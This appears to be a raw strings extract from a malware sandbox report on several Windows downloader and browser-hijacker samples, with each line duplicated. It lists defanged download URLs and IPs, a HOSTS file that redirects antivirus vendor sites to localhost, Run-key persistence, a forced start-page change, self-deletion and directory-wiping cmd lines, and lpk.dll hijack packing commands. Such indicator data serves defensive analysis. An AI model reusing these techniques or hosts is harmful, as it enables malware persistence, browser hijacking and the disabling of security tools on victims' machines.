Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*
User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1)
User-Agent:Mozilla/4.0 (compatible; MSIE %d.0; Windows NT %d.1; SV1)
Host: %s:%d
Host: %s:%d
Host: %s
Host: %s
User-Agent:Mozilla/5.0 (X11; U; Linux i686; en-US; re:1.4.0) Gecko/20080808 Firefox/%d.0
User-Agent:Mozilla/5.0 (X11; U; Linux i686; en-US; re:1.4.0) Gecko/20080808 Firefox/%d.0
Referer: hXXp://%s:80/hXXp://%s
Referer: hXXp://%s:80/hXXp://%s
%s %s%s
%s %s%s
User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01)
User-Agent:Mozilla/4.0 (compatible; MSIE %d.00; Windows NT %d.0; MyIE 3.01)
User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)
%d.%d.%d.%d
%d.%d.%d.%d
192.168.1.244
192.168.1.244
svchost.exe
svchost.exe
ntdll.dll
ntdll.dll
@.reloc
@.reloc
lpk.dll
lpk.dll
cmd /c RD /s /q "%s"
cmd /c RD /s /q "%s"
"%s" a -r -ep1"%s" "%s" "%s\lpk.dll"
"%s" a -r -ep1"%s" "%s" "%s\lpk.dll"
"%s" x "%s" *.exe "%s\"
"%s" x "%s" *.exe "%s\"
cmd /c %s vb "%s" lpk.dll|find /i "lpk.dll"
cmd /c %s vb "%s" lpk.dll|find /i "lpk.dll"
rar.exe
rar.exe
kmokq.exe_1948:
.text
.text
`.rdata
`.rdata
@.data
@.data
KERNEL32.dll
KERNEL32.dll
EnumWindows
EnumWindows
USER32.dll
USER32.dll
RegCloseKey
RegCloseKey
RegOpenKeyExA
RegOpenKeyExA
ADVAPI32.dll
ADVAPI32.dll
WS2_32.dll
WS2_32.dll
MSVCP60.dll
MSVCP60.dll
MSVCRT.dll
MSVCRT.dll
DeleteUrlCacheEntry
DeleteUrlCacheEntry
WININET.dll
WININET.dll
URLDownloadToFileA
URLDownloadToFileA
urlmon.dll
urlmon.dll
SHLWAPI.dll
SHLWAPI.dll
hXXp://623968.6600.org:99/3.htm
hXXp://623968.6600.org:99/3.htm
201405131714
201405131714
124.232.158.160
124.232.158.160
dk.23145.com
dk.23145.com
Applications\iexplore.exe\SHELL\OPEN\COMMAND
Applications\iexplore.exe\SHELL\OPEN\COMMAND
hXXp://
hXXp://
%s?%c%c%c%c%c
%s?%c%c%c%c%c
%s%c%c%c%c%c.htm
%s%c%c%c%c%c.htm
hXXp://VVV.sfy365.com/1.78
hXXp://VVV.sfy365.com/1.78
hXXp://VVV.yao933.com/
hXXp://VVV.yao933.com/
124.232.141.61
124.232.141.61
QQExtrenal.exe_3124:
.text
.text
`.data
`.data
.rsrc
.rsrc
MSVBVM60.DLL
MSVBVM60.DLL
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
# This is a sample HOSTS file used by Microsoft TCP/IP for Windows.
# 102.54.94.97 rhino.acme.com # source server
# 102.54.94.97 rhino.acme.com # source server
# 38.25.63.10 x.acme.com # x client host
# 38.25.63.10 x.acme.com # x client host
127.0.0.1 localhost
127.0.0.1 localhost
127.0.0.1 VVV.ijinshan.com
127.0.0.1 VVV.ijinshan.com
127.0.0.1 VVV.360.cn
127.0.0.1 VVV.360.cn
127.0.0.1 VVV.rising.com.cn
127.0.0.1 VVV.rising.com.cn
127.0.0.1 kaba365.com
127.0.0.1 kaba365.com
xxD.Downloader
xxD.Downloader
VB5!6&vb6chs.dll
VB5!6&vb6chs.dll
D:\Program Files\Microsoft Visual Studio\VB98\VB6.OLB
D:\Program Files\Microsoft Visual Studio\VB98\VB6.OLB
advapi32.dll
advapi32.dll
RegCreateKeyA
RegCreateKeyA
RegCloseKey
RegCloseKey
VBA6.DLL
VBA6.DLL
c:\windows\system32\jarinet
c:\windows\system32\jarinet
cmd /c taskkill /f /im QQExtrenal.exe
cmd /c taskkill /f /im QQExtrenal.exe
hXXp://
hXXp://
%System%\drivers\etc\hosts
%System%\drivers\etc\hosts
Microsoft.XMLHTTP
Microsoft.XMLHTTP
Adodb.Stream
Adodb.Stream
c:\windows\inf\
c:\windows\inf\
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\Run
c:\windows\system32\jarinet\QQExtrenal.exe
c:\windows\system32\jarinet\QQExtrenal.exe
c:\windows\system32\jarinet\QQExtrenal.exe "
c:\windows\system32\jarinet\QQExtrenal.exe "
.exe"
.exe"
xxDown.exe
xxDown.exe
comine.exe_3324:
.text
.text
`.data
`.data
.rsrc
.rsrc
MSVBVM60.DLL
MSVBVM60.DLL
vb6chs.dll
vb6chs.dll
d:\Program Files\Microsoft Visual Studio\VB98\VB6.OLB
d:\Program Files\Microsoft Visual Studio\VB98\VB6.OLB
psapi.dll
psapi.dll
kernel32.dll
kernel32.dll
NTDLL.DLL
NTDLL.DLL
shell32.dll
shell32.dll
SHFileOperationA
SHFileOperationA
ShellExecuteA
ShellExecuteA
VBA6.DLL
VBA6.DLL
1.vbp
1.vbp
hXXp://VVV.hao12338.com/?index
hXXp://VVV.hao12338.com/?index
IEXPLORE.EXE|TTRAVELER.EXE|SOGOUEXPLORER.EXE|360SE.EXE|GREENBROWSER.EXE|FIREFOX.EXE|MAXTHON.EXE|THEWORLD.EXE|OPERA.EXE|CHROME.EXE|SAFARI.EXE|NETSCAPE.EXE
IEXPLORE.EXE|TTRAVELER.EXE|SOGOUEXPLORER.EXE|360SE.EXE|GREENBROWSER.EXE|FIREFOX.EXE|MAXTHON.EXE|THEWORLD.EXE|OPERA.EXE|CHROME.EXE|SAFARI.EXE|NETSCAPE.EXE
%Program Files%\Windows Media Player
%Program Files%\Windows Media Player
%Program Files%
%Program Files%
explorer.exe
explorer.exe
WScript.Shell
WScript.Shell
Iexplore.exe
Iexplore.exe
wscript.shell
wscript.shell
cmd /c ping 127.0.0.1 -n 2&del
cmd /c ping 127.0.0.1 -n 2&del
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Windows
%Program Files%\Windows Media Player\comine.exe
%Program Files%\Windows Media Player\comine.exe
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page
HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page
%Program Files%\Internet Explorer\iexplore.exe
%Program Files%\Internet Explorer\iexplore.exe
WindowStyle
WindowStyle
Hotkey
Hotkey
serv.dat
serv.dat
news4979.exe_3348:
.text
.text
`.data
`.data
.rsrc
.rsrc
MSVBVM60.DLL
MSVBVM60.DLL
WebBrowser2
WebBrowser2
SHDocVwCtl.WebBrowser
SHDocVwCtl.WebBrowser
WebBrowser1
WebBrowser1
vb6chs.dll
vb6chs.dll
shdocvw.dll
shdocvw.dll
WebBrowser
WebBrowser
4%System%\shdocvw.oca
4%System%\shdocvw.oca
%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
%Program Files%\Microsoft Visual Studio\VB98\VB6.OLB
advapi32.dll
advapi32.dll
RegCreateKeyA
RegCreateKeyA
RegCloseKey
RegCloseKey
RegOpenKeyA
RegOpenKeyA
RegDeleteKeyA
RegDeleteKeyA
shell32.dll
shell32.dll
ShellExecuteA
ShellExecuteA
psapi.dll
psapi.dll
EnumWindows
EnumWindows
psapi.dll
psapi.dll
RegCreateKeyExA
RegCreateKeyExA
RegOpenKeyExA
RegOpenKeyExA
VBA6.DLL
VBA6.DLL
hXXp:///
hXXp:///
%Program Files%
%Program Files%
@isual Studio\VB98\LINK.EXE.M
@isual Studio\VB98\LINK.EXE.M
1.vbp
1.vbp
yyg.so
yyg.so
hXXp://96xx.net/tj2.html?1114
hXXp://96xx.net/tj2.html?1114
hXXp://wei.96xx.net/index.php?m=weixin&a=order&id=89
hXXp://wei.96xx.net/index.php?m=weixin&a=order&id=89
Chrome_WidgetWin
Chrome_WidgetWin
360se.exe
360se.exe
baidu.com
baidu.com
hao123.com
hao123.com
chrome.exe
chrome.exe
sogouexplorer.exe
sogouexplorer.exe
baidubrowser.exe
baidubrowser.exe
360chrome.exe
360chrome.exe
maxthon.exe
maxthon.exe
qqbrowser.exe
qqbrowser.exe
iexplore.exe
iexplore.exe
\Google Chrome.lnk
\Google Chrome.lnk
\Internet Explorer.lnk
\Internet Explorer.lnk
wscript.shell
wscript.shell
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Desktop
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Desktop
Wscript.shell
Wscript.shell
C:\Users\Public\Desktop\
C:\Users\Public\Desktop\
C:\Users\Public\Desktop
C:\Users\Public\Desktop